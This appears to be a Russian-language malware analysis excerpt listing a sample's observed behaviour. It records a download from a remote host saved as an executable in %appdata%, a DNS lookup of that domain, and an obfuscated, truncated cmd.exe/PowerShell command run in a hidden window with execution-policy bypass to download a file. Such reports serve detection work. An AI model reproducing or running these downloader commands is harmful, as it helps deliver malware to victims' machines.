Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^W^E^RShe^lL.eXE^ ^-^EXec^u^t^Ion^POLI^c^Y^ ^ByPasS -N^oPRoFi^LE -wInDoWstYl^e ^Hi^dDeN^ (nE^W^-^ObjecT ^s^YstEM.nET.WeBc^lI^ENt^)^.d^Own^LO^aDF^iL^E^('http://www.doorasope.top/re...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "po^W^E^RShe^lL.eXE^ ^-^EXec^u^t^Ion^POLI^c^Y^ ^ByPasS -N^oPRoFi^LE -wInDoWstYl^e ^Hi^dDeN^ (nE^W^-^ObjecT ^s^YstEM.nET.WeBc^lI^ENt^)^.d^Own^LO^aDF^iL^E^('http://www.doorasope.top/re...' (со скрытым окном)